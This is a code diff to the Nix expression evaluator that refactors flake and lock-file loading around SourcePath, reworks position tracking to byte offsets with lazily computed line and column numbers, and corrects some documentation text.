diff --git a/src/libexpr/eval.hh b/src/libexpr/eval.hh
index 01abd4eb1..368bb17b3 100644
--- a/src/libexpr/eval.hh
+++ b/src/libexpr/eval.hh
@@ -153,6 +153,7 @@ struct DebugTrace {
bool isError;
};
+
class EvalState : public std::enable_shared_from_this
{
public:
@@ -222,6 +223,7 @@ public:
*/
ReplExitStatus (* debugRepl)(ref es, const ValMap & extraEnv);
bool debugStop;
+ bool inDebugger = false;
int trylevel;
std::list debugTraces;
std::map> exprEnvs;
diff --git a/src/libexpr/flake/flake.cc b/src/libexpr/flake/flake.cc
index 022d39cdb..bca473453 100644
--- a/src/libexpr/flake/flake.cc
+++ b/src/libexpr/flake/flake.cc
@@ -139,7 +139,7 @@ static FlakeInput parseFlakeInput(EvalState & state,
attrs.emplace(state.symbols[attr.name], Explicit { attr.value->boolean });
break;
case nInt:
- attrs.emplace(state.symbols[attr.name], (long unsigned int)attr.value->integer);
+ attrs.emplace(state.symbols[attr.name], (long unsigned int) attr.value->integer);
break;
default:
if (attr.name == state.symbols.create("publicKeys")) {
@@ -202,43 +202,27 @@ static std::map parseFlakeInputs(
return inputs;
}
-static Flake getFlake(
+static Flake readFlake(
EvalState & state,
const FlakeRef & originalRef,
- bool allowLookup,
- FlakeCache & flakeCache,
- InputPath lockRootPath)
+ const FlakeRef & resolvedRef,
+ const FlakeRef & lockedRef,
+ const SourcePath & rootDir,
+ const InputPath & lockRootPath)
{
- auto [storePath, resolvedRef, lockedRef] = fetchOrSubstituteTree(
- state, originalRef, allowLookup, flakeCache);
+ auto flakePath = rootDir / CanonPath(resolvedRef.subdir) / "flake.nix";
- // We need to guard against symlink attacks, but before we start doing
- // filesystem operations we should make sure there's a flake.nix in the
- // first place.
- auto unsafeFlakeDir = state.store->toRealPath(storePath) + "/" + lockedRef.subdir;
- auto unsafeFlakeFile = unsafeFlakeDir + "/flake.nix";
- if (!pathExists(unsafeFlakeFile))
- throw Error("source tree referenced by '%s' does not contain a '%s/flake.nix' file", lockedRef, lockedRef.subdir);
-
- // Guard against symlink attacks.
- auto flakeDir = canonPath(unsafeFlakeDir, true);
- auto flakeFile = canonPath(flakeDir + "/flake.nix", true);
- if (!isInDir(flakeFile, state.store->toRealPath(storePath)))
- throw Error("'flake.nix' file of flake '%s' escapes from '%s'",
- lockedRef, state.store->printStorePath(storePath));
+ // NOTE evalFile forces vInfo to be an attrset because mustBeTrivial is true.
+ Value vInfo;
+ state.evalFile(flakePath, vInfo, true);
Flake flake {
.originalRef = originalRef,
.resolvedRef = resolvedRef,
.lockedRef = lockedRef,
- .storePath = storePath,
+ .path = flakePath,
};
- Value vInfo;
- state.evalFile(state.rootPath(CanonPath(flakeFile)), vInfo, true); // FIXME: symlink attack
-
- expectType(state, nAttrs, vInfo, state.positions.add({state.rootPath(CanonPath(flakeFile))}, 1, 1));
-
if (auto description = vInfo.attrs->get(state.sDescription)) {
expectType(state, nString, *description->value, description->pos);
flake.description = description->value->c_str();
@@ -247,7 +231,7 @@ static Flake getFlake(
auto sInputs = state.symbols.create("inputs");
if (auto inputs = vInfo.attrs->get(sInputs))
- flake.inputs = parseFlakeInputs(state, inputs->value, inputs->pos, flakeDir, lockRootPath);
+ flake.inputs = parseFlakeInputs(state, inputs->value, inputs->pos, flakePath.parent().path.abs(), lockRootPath); // FIXME
auto sOutputs = state.symbols.create("outputs");
@@ -264,7 +248,7 @@ static Flake getFlake(
}
} else
- throw Error("flake '%s' lacks attribute 'outputs'", lockedRef);
+ throw Error("flake '%s' lacks attribute 'outputs'", resolvedRef);
auto sNixConfig = state.symbols.create("nixConfig");
@@ -281,7 +265,7 @@ static Flake getFlake(
NixStringContext emptyContext = {};
flake.config.settings.emplace(
state.symbols[setting.name],
- state.coerceToString(setting.pos, *setting.value, emptyContext, "", false, true, true) .toOwned());
+ state.coerceToString(setting.pos, *setting.value, emptyContext, "", false, true, true).toOwned());
}
else if (setting.value->type() == nInt)
flake.config.settings.emplace(
@@ -313,12 +297,25 @@ static Flake getFlake(
attr.name != sOutputs &&
attr.name != sNixConfig)
throw Error("flake '%s' has an unsupported attribute '%s', at %s",
- lockedRef, state.symbols[attr.name], state.positions[attr.pos]);
+ resolvedRef, state.symbols[attr.name], state.positions[attr.pos]);
}
return flake;
}
+static Flake getFlake(
+ EvalState & state,
+ const FlakeRef & originalRef,
+ bool allowLookup,
+ FlakeCache & flakeCache,
+ InputPath lockRootPath)
+{
+ auto [storePath, resolvedRef, lockedRef] = fetchOrSubstituteTree(
+ state, originalRef, allowLookup, flakeCache);
+
+ return readFlake(state, originalRef, resolvedRef, lockedRef, state.rootPath(state.store->toRealPath(storePath)), lockRootPath);
+}
+
Flake getFlake(EvalState & state, const FlakeRef & originalRef, bool allowLookup, FlakeCache & flakeCache)
{
return getFlake(state, originalRef, allowLookup, flakeCache, {});
@@ -330,6 +327,13 @@ Flake getFlake(EvalState & state, const FlakeRef & originalRef, bool allowLookup
return getFlake(state, originalRef, allowLookup, flakeCache);
}
+static LockFile readLockFile(const SourcePath & lockFilePath)
+{
+ return lockFilePath.pathExists()
+ ? LockFile(lockFilePath.readFile(), fmt("%s", lockFilePath))
+ : LockFile();
+}
+
/* Compute an in-memory lock file for the specified top-level flake,
and optionally write it to file, if the flake is writable. */
LockedFlake lockFlake(
@@ -355,17 +359,16 @@ LockedFlake lockFlake(
throw Error("reference lock file was provided, but the `allow-dirty` setting is set to false");
}
- // FIXME: symlink attack
- auto oldLockFile = LockFile::read(
+ auto oldLockFile = readLockFile(
lockFlags.referenceLockFilePath.value_or(
- state.store->toRealPath(flake.storePath) + "/" + flake.lockedRef.subdir + "/flake.lock"));
+ flake.lockFilePath()));
debug("old lock file: %s", oldLockFile);
std::map overrides;
std::set explicitCliOverrides;
std::set overridesUsed, updatesUsed;
- std::map][, StorePath> nodePaths;
+ std::map][, SourcePath> nodePaths;
for (auto & i : lockFlags.inputOverrides) {
overrides.insert_or_assign(i.first, FlakeInput { .ref = i.second });
@@ -538,7 +541,7 @@ LockedFlake lockFlake(
if (mustRefetch) {
auto inputFlake = getFlake(state, oldLock->lockedRef, false, flakeCache, inputPath);
- nodePaths.emplace(childNode, inputFlake.storePath);
+ nodePaths.emplace(childNode, inputFlake.path.parent());
computeLocks(inputFlake.inputs, childNode, inputPath, oldLock, lockRootPath, parentPath, false);
} else {
computeLocks(fakeInputs, childNode, inputPath, oldLock, lockRootPath, parentPath, true);
@@ -587,13 +590,12 @@ LockedFlake lockFlake(
flake. Also, unless we already have this flake
in the top-level lock file, use this flake's
own lock file. */
- nodePaths.emplace(childNode, inputFlake.storePath);
+ nodePaths.emplace(childNode, inputFlake.path.parent());
computeLocks(
inputFlake.inputs, childNode, inputPath,
oldLock
? std::dynamic_pointer_cast(oldLock)
- : LockFile::read(
- state.store->toRealPath(inputFlake.storePath) + "/" + inputFlake.lockedRef.subdir + "/flake.lock").root.get_ptr(),
+ : readLockFile(inputFlake.lockFilePath()).root.get_ptr(),
oldLock ? lockRootPath : inputPath,
localPath,
false);
@@ -605,7 +607,7 @@ LockedFlake lockFlake(
auto childNode = make_ref(lockedRef, ref, false);
- nodePaths.emplace(childNode, storePath);
+ nodePaths.emplace(childNode, state.rootPath(state.store->toRealPath(storePath)));
node->inputs.insert_or_assign(id, childNode);
}
@@ -619,9 +621,9 @@ LockedFlake lockFlake(
};
// Bring in the current ref for relative path resolution if we have it
- auto parentPath = canonPath(state.store->toRealPath(flake.storePath) + "/" + flake.lockedRef.subdir, true);
+ auto parentPath = flake.path.parent().path.abs();
- nodePaths.emplace(newLockFile.root, flake.storePath);
+ nodePaths.emplace(newLockFile.root, flake.path.parent());
computeLocks(
flake.inputs,
@@ -746,13 +748,15 @@ void callFlake(EvalState & state,
auto overrides = state.buildBindings(lockedFlake.nodePaths.size());
- for (auto & [node, storePath] : lockedFlake.nodePaths) {
+ for (auto & [node, sourcePath] : lockedFlake.nodePaths) {
auto override = state.buildBindings(2);
auto & vSourceInfo = override.alloc(state.symbols.create("sourceInfo"));
auto lockedNode = node.dynamic_pointer_cast();
+ auto [storePath, subdir] = state.store->toStorePath(sourcePath.path.abs());
+
emitTreeAttrs(
state,
storePath,
@@ -766,7 +770,7 @@ void callFlake(EvalState & state,
override
.alloc(state.symbols.create("dir"))
- .mkString(lockedNode ? lockedNode->lockedRef.subdir : lockedFlake.flake.lockedRef.subdir);
+ .mkString(CanonPath(subdir).rel());
overrides.alloc(state.symbols.create(key->second)).mkAttrs(override);
}
@@ -921,18 +925,17 @@ static RegisterPrimOp r4({
}
-Fingerprint LockedFlake::getFingerprint() const
+std::optional LockedFlake::getFingerprint(ref store) const
{
+ if (lockFile.isUnlocked()) return std::nullopt;
+
+ auto fingerprint = flake.lockedRef.input.getFingerprint(store);
+ if (!fingerprint) return std::nullopt;
+
// FIXME: as an optimization, if the flake contains a lock file
// and we haven't changed it, then it's sufficient to use
// flake.sourceInfo.storePath for the fingerprint.
- return hashString(HashAlgorithm::SHA256,
- fmt("%s;%s;%d;%d;%s",
- flake.storePath.to_string(),
- flake.lockedRef.subdir,
- flake.lockedRef.input.getRevCount().value_or(0),
- flake.lockedRef.input.getLastModified().value_or(0),
- lockFile));
+ return hashString(HashAlgorithm::SHA256, fmt("%s;%s;%s", *fingerprint, flake.lockedRef.subdir, lockFile));
}
Flake::~Flake() { }
diff --git a/src/libexpr/flake/flake.hh b/src/libexpr/flake/flake.hh
index 19b680c56..1ba085f0f 100644
--- a/src/libexpr/flake/flake.hh
+++ b/src/libexpr/flake/flake.hh
@@ -77,18 +77,27 @@ struct Flake
* the specific local store result of invoking the fetcher
*/
FlakeRef lockedRef;
+ /**
+ * The path of `flake.nix`.
+ */
+ SourcePath path;
/**
* pretend that 'lockedRef' is dirty
*/
bool forceDirty = false;
std::optional description;
- StorePath storePath;
FlakeInputs inputs;
/**
* 'nixConfig' attribute
*/
ConfigFile config;
+
~Flake();
+
+ SourcePath lockFilePath()
+ {
+ return path.parent() / "flake.lock";
+ }
};
Flake getFlake(EvalState & state, const FlakeRef & flakeRef, bool allowLookup);
@@ -104,13 +113,13 @@ struct LockedFlake
LockFile lockFile;
/**
- * Store paths of nodes that have been fetched in
+ * Source tree accessors for nodes that have been fetched in
* lockFlake(); in particular, the root node and the overriden
* inputs.
*/
- std::map][, StorePath> nodePaths;
+ std::map][, SourcePath> nodePaths;
- Fingerprint getFingerprint() const;
+ std::optional getFingerprint(ref store) const;
};
struct LockFlags
@@ -165,7 +174,7 @@ struct LockFlags
/**
* The path to a lock file to read instead of the `flake.lock` file in the top-level flake
*/
- std::optional referenceLockFilePath;
+ std::optional referenceLockFilePath;
/**
* The path to a lock file to write to instead of the `flake.lock` file in the top-level flake
diff --git a/src/libexpr/flake/flakeref.cc b/src/libexpr/flake/flakeref.cc
index 86a0982f3..6e4aad64d 100644
--- a/src/libexpr/flake/flakeref.cc
+++ b/src/libexpr/flake/flakeref.cc
@@ -102,6 +102,19 @@ std::pair parsePathFlakeRefWithFragment(
if (isFlake) {
+ if (!S_ISDIR(lstat(path).st_mode)) {
+ if (baseNameOf(path) == "flake.nix") {
+ // Be gentle with people who accidentally write `/foo/bar/flake.nix` instead of `/foo/bar`
+ warn(
+ "Path '%s' should point at the directory containing the 'flake.nix' file, not the file itself. "
+ "Pretending that you meant '%s'"
+ , path, dirOf(path));
+ path = dirOf(path);
+ } else {
+ throw BadURL("path '%s' is not a flake (because it's not a directory)", path);
+ }
+ }
+
if (!allowMissing && !pathExists(path + "/flake.nix")){
notice("path '%s' does not contain a 'flake.nix', searching up",path);
@@ -124,9 +137,6 @@ std::pair parsePathFlakeRefWithFragment(
throw BadURL("could not find a flake.nix file");
}
- if (!S_ISDIR(lstat(path).st_mode))
- throw BadURL("path '%s' is not a flake (because it's not a directory)", path);
-
if (!allowMissing && !pathExists(path + "/flake.nix"))
throw BadURL("path '%s' is not a flake (because it doesn't contain a 'flake.nix' file)", path);
@@ -274,7 +284,7 @@ FlakeRef FlakeRef::fromAttrs(const fetchers::Attrs & attrs)
std::pair FlakeRef::fetchTree(ref store) const
{
- auto [storePath, lockedInput] = input.fetch(store);
+ auto [storePath, lockedInput] = input.fetchToStore(store);
return {std::move(storePath), FlakeRef(std::move(lockedInput), subdir)};
}
diff --git a/src/libexpr/flake/lockfile.cc b/src/libexpr/flake/lockfile.cc
index e3a28c7c6..d252214dd 100644
--- a/src/libexpr/flake/lockfile.cc
+++ b/src/libexpr/flake/lockfile.cc
@@ -84,8 +84,10 @@ std::shared_ptr LockFile::findInput(const InputPath & path)
return doFind(root, path, visited);
}
-LockFile::LockFile(const nlohmann::json & json, const Path & path)
+LockFile::LockFile(std::string_view contents, std::string_view path)
{
+ auto json = nlohmann::json::parse(contents);
+
auto version = json.value("version", 0);
if (version < 5 || version > 7)
throw Error("lock file '%s' has unsupported version %d", path, version);
@@ -203,12 +205,6 @@ std::pair LockFile::to_string() const
return {json.dump(2), std::move(nodeKeys)};
}
-LockFile LockFile::read(const Path & path)
-{
- if (!pathExists(path)) return LockFile();
- return LockFile(nlohmann::json::parse(readFile(path)), path);
-}
-
std::ostream & operator <<(std::ostream & stream, const LockFile & lockFile)
{
stream << lockFile.toJSON().first.dump(2);
diff --git a/src/libexpr/flake/lockfile.hh b/src/libexpr/flake/lockfile.hh
index 57a7202a2..7e62e6d09 100644
--- a/src/libexpr/flake/lockfile.hh
+++ b/src/libexpr/flake/lockfile.hh
@@ -55,7 +55,7 @@ struct LockFile
ref root = make_ref();
LockFile() {};
- LockFile(const nlohmann::json & json, const Path & path);
+ LockFile(std::string_view contents, std::string_view path);
typedef std::map][, std::string> KeyMap;
@@ -63,8 +63,6 @@ struct LockFile
std::pair to_string() const;
- static LockFile read(const Path & path);
-
/**
* Check whether this lock file has any unlocked inputs. If so,
* return one.
diff --git a/src/libexpr/lexer.l b/src/libexpr/lexer.l
index 5b26d6927..ee2b6b807 100644
--- a/src/libexpr/lexer.l
+++ b/src/libexpr/lexer.l
@@ -33,33 +33,16 @@ namespace nix {
static void initLoc(YYLTYPE * loc)
{
- loc->first_line = loc->last_line = 1;
- loc->first_column = loc->last_column = 1;
+ loc->first_line = loc->last_line = 0;
+ loc->first_column = loc->last_column = 0;
}
static void adjustLoc(YYLTYPE * loc, const char * s, size_t len)
{
loc->stash();
- loc->first_line = loc->last_line;
loc->first_column = loc->last_column;
-
- for (size_t i = 0; i < len; i++) {
- switch (*s++) {
- case '\r':
- if (*s == '\n') { /* cr/lf */
- i++;
- s++;
- }
- /* fall through */
- case '\n':
- ++loc->last_line;
- loc->last_column = 1;
- break;
- default:
- ++loc->last_column;
- }
- }
+ loc->last_column += len;
}
diff --git a/src/libexpr/nixexpr.cc b/src/libexpr/nixexpr.cc
index 4b805d710..5bdc466eb 100644
--- a/src/libexpr/nixexpr.cc
+++ b/src/libexpr/nixexpr.cc
@@ -149,7 +149,10 @@ void ExprLambda::show(const SymbolTable & symbols, std::ostream & str) const
if (hasFormals()) {
str << "{ ";
bool first = true;
- for (auto & i : formals->formals) {
+ // the natural Symbol ordering is by creation time, which can lead to the
+ // same expression being printed in two different ways depending on its
+ // context. always use lexicographic ordering to avoid this.
+ for (auto & i : formals->lexicographicOrder(symbols)) {
if (first) first = false; else str << ", ";
str << symbols[i.name];
if (i.def) {
@@ -580,6 +583,39 @@ std::string ExprLambda::showNamePos(const EvalState & state) const
+/* Position table. */
+
+Pos PosTable::operator[](PosIdx p) const
+{
+ auto origin = resolve(p);
+ if (!origin)
+ return {};
+
+ const auto offset = origin->offsetOf(p);
+
+ Pos result{0, 0, origin->origin};
+ auto lines = this->lines.lock();
+ auto linesForInput = (*lines)[origin->offset];
+
+ if (linesForInput.empty()) {
+ auto source = result.getSource().value_or("");
+ const char * begin = source.data();
+ for (Pos::LinesIterator it(source), end; it != end; it++)
+ linesForInput.push_back(it->data() - begin);
+ if (linesForInput.empty())
+ linesForInput.push_back(0);
+ }
+ // as above: the first line starts at byte 0 and is always present
+ auto lineStartOffset = std::prev(
+ std::upper_bound(linesForInput.begin(), linesForInput.end(), offset));
+
+ result.line = 1 + (lineStartOffset - linesForInput.begin());
+ result.column = 1 + (offset - *lineStartOffset);
+ return result;
+}
+
+
+
/* Symbol table. */
size_t SymbolTable::totalSize() const
diff --git a/src/libexpr/nixexpr.hh b/src/libexpr/nixexpr.hh
index 94356759b..e3cae8385 100644
--- a/src/libexpr/nixexpr.hh
+++ b/src/libexpr/nixexpr.hh
@@ -7,7 +7,6 @@
#include "value.hh"
#include "symbol-table.hh"
#include "error.hh"
-#include "chunked-vector.hh"
#include "position.hh"
#include "eval-error.hh"
#include "pos-idx.hh"
diff --git a/src/libexpr/parser-state.hh b/src/libexpr/parser-state.hh
index 34aef661f..024e79c43 100644
--- a/src/libexpr/parser-state.hh
+++ b/src/libexpr/parser-state.hh
@@ -24,20 +24,15 @@ struct ParserLocation
int last_line, last_column;
// backup to recover from yyless(0)
- int stashed_first_line, stashed_first_column;
- int stashed_last_line, stashed_last_column;
+ int stashed_first_column, stashed_last_column;
void stash() {
- stashed_first_line = first_line;
stashed_first_column = first_column;
- stashed_last_line = last_line;
stashed_last_column = last_column;
}
void unstash() {
- first_line = stashed_first_line;
first_column = stashed_first_column;
- last_line = stashed_last_line;
last_column = stashed_last_column;
}
};
@@ -276,7 +271,7 @@ inline Expr * ParserState::stripIndentation(const PosIdx pos,
inline PosIdx ParserState::at(const ParserLocation & loc)
{
- return positions.add(origin, loc.first_line, loc.first_column);
+ return positions.add(origin, loc.first_column);
}
}
diff --git a/src/libexpr/parser.y b/src/libexpr/parser.y
index b0aee7b41..bff066170 100644
--- a/src/libexpr/parser.y
+++ b/src/libexpr/parser.y
@@ -64,6 +64,10 @@ using namespace nix;
void yyerror(YYLTYPE * loc, yyscan_t scanner, ParserState * state, const char * error)
{
+ if (std::string_view(error).starts_with("syntax error, unexpected end of file")) {
+ loc->first_column = loc->last_column;
+ loc->first_line = loc->last_line;
+ }
throw ParseError({
.msg = HintFmt(error),
.pos = state->positions[state->at(*loc)]
@@ -87,6 +91,7 @@ void yyerror(YYLTYPE * loc, yyscan_t scanner, ParserState * state, const char *
nix::StringToken uri;
nix::StringToken str;
std::vector * attrNames;
+ std::vector> * inheritAttrs;
std::vector> * string_parts;
std::vector>> * ind_string_parts;
}
@@ -97,7 +102,8 @@ void yyerror(YYLTYPE * loc, yyscan_t scanner, ParserState * state, const char *
%type binds
%type formals
%type formal
-%type attrs attrpath
+%type attrpath
+%type attrs
%type string_parts_interpolated
%type ind_string_parts
%type path_start string_parts string_attr
@@ -309,13 +315,12 @@ binds
: binds attrpath '=' expr ';' { $$ = $1; state->addAttr($$, std::move(*$2), $4, state->at(@2)); delete $2; }
| binds INHERIT attrs ';'
{ $$ = $1;
- for (auto & i : *$3) {
+ for (auto & [i, iPos] : *$3) {
if ($$->attrs.find(i.symbol) != $$->attrs.end())
- state->dupAttr(i.symbol, state->at(@3), $$->attrs[i.symbol].pos);
- auto pos = state->at(@3);
+ state->dupAttr(i.symbol, iPos, $$->attrs[i.symbol].pos);
$$->attrs.emplace(
i.symbol,
- ExprAttrs::AttrDef(new ExprVar(CUR_POS, i.symbol), pos, ExprAttrs::AttrDef::Kind::Inherited));
+ ExprAttrs::AttrDef(new ExprVar(iPos, i.symbol), iPos, ExprAttrs::AttrDef::Kind::Inherited));
}
delete $3;
}
@@ -325,14 +330,14 @@ binds
$$->inheritFromExprs = std::make_unique>();
$$->inheritFromExprs->push_back($4);
auto from = new nix::ExprInheritFrom(state->at(@4), $$->inheritFromExprs->size() - 1);
- for (auto & i : *$6) {
+ for (auto & [i, iPos] : *$6) {
if ($$->attrs.find(i.symbol) != $$->attrs.end())
- state->dupAttr(i.symbol, state->at(@6), $$->attrs[i.symbol].pos);
+ state->dupAttr(i.symbol, iPos, $$->attrs[i.symbol].pos);
$$->attrs.emplace(
i.symbol,
ExprAttrs::AttrDef(
- new ExprSelect(CUR_POS, from, i.symbol),
- state->at(@6),
+ new ExprSelect(iPos, from, i.symbol),
+ iPos,
ExprAttrs::AttrDef::Kind::InheritedFrom));
}
delete $6;
@@ -341,12 +346,12 @@ binds
;
attrs
- : attrs attr { $$ = $1; $1->push_back(AttrName(state->symbols.create($2))); }
+ : attrs attr { $$ = $1; $1->emplace_back(AttrName(state->symbols.create($2)), state->at(@2)); }
| attrs string_attr
{ $$ = $1;
ExprString * str = dynamic_cast($2);
if (str) {
- $$->push_back(AttrName(state->symbols.create(str->s)));
+ $$->emplace_back(AttrName(state->symbols.create(str->s)), state->at(@2));
delete str;
} else
throw ParseError({
@@ -354,7 +359,7 @@ attrs
.pos = state->positions[state->at(@2)]
});
}
- | { $$ = new AttrPath; }
+ | { $$ = new std::vector>; }
;
attrpath
@@ -433,7 +438,7 @@ Expr * parseExprFromBuf(
.symbols = symbols,
.positions = positions,
.basePath = basePath,
- .origin = {origin},
+ .origin = positions.addOrigin(origin, length),
.rootFS = rootFS,
.s = astSymbols,
};
diff --git a/src/libexpr/pos-idx.hh b/src/libexpr/pos-idx.hh
index 9949f1dc5..e94fd85c6 100644
--- a/src/libexpr/pos-idx.hh
+++ b/src/libexpr/pos-idx.hh
@@ -6,6 +6,7 @@ namespace nix {
class PosIdx
{
+ friend struct LazyPosAcessors;
friend class PosTable;
private:
diff --git a/src/libexpr/pos-table.hh b/src/libexpr/pos-table.hh
index 1decf3c85..8a0a3ba86 100644
--- a/src/libexpr/pos-table.hh
+++ b/src/libexpr/pos-table.hh
@@ -7,6 +7,7 @@
#include "chunked-vector.hh"
#include "pos-idx.hh"
#include "position.hh"
+#include "sync.hh"
namespace nix {
@@ -17,66 +18,69 @@ public:
{
friend PosTable;
private:
- // must always be invalid by default, add() replaces this with the actual value.
- // subsequent add() calls use this index as a token to quickly check whether the
- // current origins.back() can be reused or not.
- mutable uint32_t idx = std::numeric_limits::max();
+ uint32_t offset;
- // Used for searching in PosTable::[].
- explicit Origin(uint32_t idx)
- : idx(idx)
- , origin{std::monostate()}
- {
- }
+ Origin(Pos::Origin origin, uint32_t offset, size_t size):
+ offset(offset), origin(origin), size(size)
+ {}
public:
const Pos::Origin origin;
+ const size_t size;
- Origin(Pos::Origin origin)
- : origin(origin)
+ uint32_t offsetOf(PosIdx p) const
{
+ return p.id - 1 - offset;
}
};
- struct Offset
- {
- uint32_t line, column;
- };
-
private:
- std::vector origins;
- ChunkedVector offsets;
+ using Lines = std::vector;
-public:
- PosTable()
- : offsets(1024)
- {
- origins.reserve(1024);
- }
+ std::map origins;
+ mutable Sync> lines;
- PosIdx add(const Origin & origin, uint32_t line, uint32_t column)
+ const Origin * resolve(PosIdx p) const
{
- const auto idx = offsets.add({line, column}).second;
- if (origins.empty() || origins.back().idx != origin.idx) {
- origin.idx = idx;
- origins.push_back(origin);
- }
- return PosIdx(idx + 1);
- }
+ if (p.id == 0)
+ return nullptr;
- Pos operator[](PosIdx p) const
- {
- if (p.id == 0 || p.id > offsets.size())
- return {};
const auto idx = p.id - 1;
/* we want the last key <= idx, so we'll take prev(first key > idx).
- this is guaranteed to never rewind origin.begin because the first
- key is always 0. */
- const auto pastOrigin = std::upper_bound(
- origins.begin(), origins.end(), Origin(idx), [](const auto & a, const auto & b) { return a.idx < b.idx; });
- const auto origin = *std::prev(pastOrigin);
- const auto offset = offsets[idx];
- return {offset.line, offset.column, origin.origin};
+ this is guaranteed to never rewind origin.begin because the first
+ key is always 0. */
+ const auto pastOrigin = origins.upper_bound(idx);
+ return &std::prev(pastOrigin)->second;
+ }
+
+public:
+ Origin addOrigin(Pos::Origin origin, size_t size)
+ {
+ uint32_t offset = 0;
+ if (auto it = origins.rbegin(); it != origins.rend())
+ offset = it->first + it->second.size;
+ // +1 because all PosIdx are offset by 1 to begin with, and
+ // another +1 to ensure that all origins can point to EOF, eg
+ // on (invalid) empty inputs.
+ if (2 + offset + size < offset)
+ return Origin{origin, offset, 0};
+ return origins.emplace(offset, Origin{origin, offset, size}).first->second;
+ }
+
+ PosIdx add(const Origin & origin, size_t offset)
+ {
+ if (offset > origin.size)
+ return PosIdx();
+ return PosIdx(1 + origin.offset + offset);
+ }
+
+ Pos operator[](PosIdx p) const;
+
+ Pos::Origin originOf(PosIdx p) const
+ {
+ if (auto o = resolve(p))
+ return o->origin;
+ return std::monostate{};
}
};
diff --git a/src/libexpr/primops.cc b/src/libexpr/primops.cc
index 78f7f71ed..bc2a70496 100644
--- a/src/libexpr/primops.cc
+++ b/src/libexpr/primops.cc
@@ -1736,7 +1736,7 @@ static RegisterPrimOp primop_findFile(PrimOp {
- If the suffix is found inside that directory, then the entry is a match.
The combined absolute path of the directory (now downloaded if need be) and the suffix is returned.
- [Lookup path](@docroot@/language/constructs/lookup-path.md) expressions can be [desugared](https://en.wikipedia.org/wiki/Syntactic_sugar) using this and [`builtins.nixPath`](@docroot@/language/builtin-constants.md#builtins-nixPath):
+ [Lookup path](@docroot@/language/constructs/lookup-path.md) expressions are [desugared](https://en.wikipedia.org/wiki/Syntactic_sugar) using this and [`builtins.nixPath`](@docroot@/language/builtin-constants.md#builtins-nixPath):
```nix
@@ -2524,6 +2524,54 @@ static RegisterPrimOp primop_unsafeGetAttrPos(PrimOp {
.fun = prim_unsafeGetAttrPos,
});
+// access to exact position information (ie, line and colum numbers) is deferred
+// due to the cost associated with calculating that information and how rarely
+// it is used in practice. this is achieved by creating thunks to otherwise
+// inaccessible primops that are not exposed as __op or under builtins to turn
+// the internal PosIdx back into a line and column number, respectively. exposing
+// these primops in any way would at best be not useful and at worst create wildly
+// indeterministic eval results depending on parse order of files.
+//
+// in a simpler world this would instead be implemented as another kind of thunk,
+// but each type of thunk has an associated runtime cost in the current evaluator.
+// as with black holes this cost is too high to justify another thunk type to check
+// for in the very hot path that is forceValue.
+static struct LazyPosAcessors {
+ PrimOp primop_lineOfPos{
+ .arity = 1,
+ .fun = [] (EvalState & state, PosIdx pos, Value * * args, Value & v) {
+ v.mkInt(state.positions[PosIdx(args[0]->integer)].line);
+ }
+ };
+ PrimOp primop_columnOfPos{
+ .arity = 1,
+ .fun = [] (EvalState & state, PosIdx pos, Value * * args, Value & v) {
+ v.mkInt(state.positions[PosIdx(args[0]->integer)].column);
+ }
+ };
+
+ Value lineOfPos, columnOfPos;
+
+ LazyPosAcessors()
+ {
+ lineOfPos.mkPrimOp(&primop_lineOfPos);
+ columnOfPos.mkPrimOp(&primop_columnOfPos);
+ }
+
+ void operator()(EvalState & state, const PosIdx pos, Value & line, Value & column)
+ {
+ Value * posV = state.allocValue();
+ posV->mkInt(pos.id);
+ line.mkApp(&lineOfPos, posV);
+ column.mkApp(&columnOfPos, posV);
+ }
+} makeLazyPosAccessors;
+
+void makePositionThunks(EvalState & state, const PosIdx pos, Value & line, Value & column)
+{
+ makeLazyPosAccessors(state, pos, line, column);
+}
+
/* Dynamic version of the `?' operator. */
static void prim_hasAttr(EvalState & state, const PosIdx pos, Value * * args, Value & v)
{
@@ -4522,11 +4570,9 @@ void EvalState::createBaseEnv()
addConstant("__nixPath", v, {
.type = nList,
.doc = R"(
- List of search path entries used to resolve [lookup paths](@docroot@/language/constructs/lookup-path.md).
+ The value of the [`nix-path` configuration setting](@docroot@/command-ref/conf-file.md#conf-nix-path): a list of search path entries used to resolve [lookup paths](@docroot@/language/constructs/lookup-path.md).
- Lookup path expressions can be
- [desugared](https://en.wikipedia.org/wiki/Syntactic_sugar)
- using this and
+ Lookup path expressions are [desugared](https://en.wikipedia.org/wiki/Syntactic_sugar) using this and
[`builtins.findFile`](./builtins.html#builtins-findFile):
```nix
diff --git a/src/libexpr/primops.hh b/src/libexpr/primops.hh
index 45486608f..9f76975db 100644
--- a/src/libexpr/primops.hh
+++ b/src/libexpr/primops.hh
@@ -51,4 +51,6 @@ void prim_importNative(EvalState & state, const PosIdx pos, Value * * args, Valu
*/
void prim_exec(EvalState & state, const PosIdx pos, Value * * args, Value & v);
+void makePositionThunks(EvalState & state, const PosIdx pos, Value & line, Value & column);
+
}
diff --git a/src/libexpr/primops/context.cc b/src/libexpr/primops/context.cc
index 1eec8b316..27a454b27 100644
--- a/src/libexpr/primops/context.cc
+++ b/src/libexpr/primops/context.cc
@@ -137,14 +137,14 @@ static RegisterPrimOp primop_addDrvOutputDependencies({
.name = "__addDrvOutputDependencies",
.args = {"s"},
.doc = R"(
- Create a copy of the given string where a single consant string context element is turned into a "derivation deep" string context element.
+ Create a copy of the given string where a single constant string context element is turned into a "derivation deep" string context element.
The store path that is the constant string context element should point to a valid derivation, and end in `.drv`.
The original string context element must not be empty or have multiple elements, and it must not have any other type of element other than a constant or derivation deep element.
The latter is supported so this function is idempotent.
- This is the opposite of [`builtins.unsafeDiscardOutputDependency`](#builtins-addDrvOutputDependencies).
+ This is the opposite of [`builtins.unsafeDiscardOutputDependency`](#builtins-unsafeDiscardOutputDependency).
)",
.fun = prim_addDrvOutputDependencies
});
@@ -246,7 +246,7 @@ static RegisterPrimOp primop_getContext({
/* Append the given context to a given string.
- See the commentary above unsafeGetContext for details of the
+ See the commentary above getContext for details of the
context representation.
*/
static void prim_appendContext(EvalState & state, const PosIdx pos, Value * * args, Value & v)
diff --git a/src/libexpr/primops/fetchMercurial.cc b/src/libexpr/primops/fetchMercurial.cc
index bb029b5b3..bfc19115a 100644
--- a/src/libexpr/primops/fetchMercurial.cc
+++ b/src/libexpr/primops/fetchMercurial.cc
@@ -64,8 +64,7 @@ static void prim_fetchMercurial(EvalState & state, const PosIdx pos, Value * * a
if (rev) attrs.insert_or_assign("rev", rev->gitRev());
auto input = fetchers::Input::fromAttrs(std::move(attrs));
- // FIXME: use name
- auto [storePath, input2] = input.fetch(state.store);
+ auto [storePath, input2] = input.fetchToStore(state.store);
